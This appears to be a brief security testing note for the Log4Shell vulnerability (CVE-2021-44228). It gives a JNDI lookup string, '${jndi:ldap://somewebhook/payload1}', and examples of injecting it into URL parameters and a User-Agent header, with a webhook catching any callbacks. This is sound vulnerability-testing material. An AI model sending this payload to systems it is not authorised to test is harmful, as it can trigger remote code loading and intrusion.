- CVE-2021-44228 Detail (NVD)
How to test
Use this string in any parameter or HTTP header that can be logged. Use Burp Suite Collaborator or any other webhook.
http://example.com?param1=${jndi:ldap://somewebhook/payload1}¶m2=...GET / HTTP/1
Host: example.com
User-Agent: ${jndi:ldap://somewebhook/payload1}
...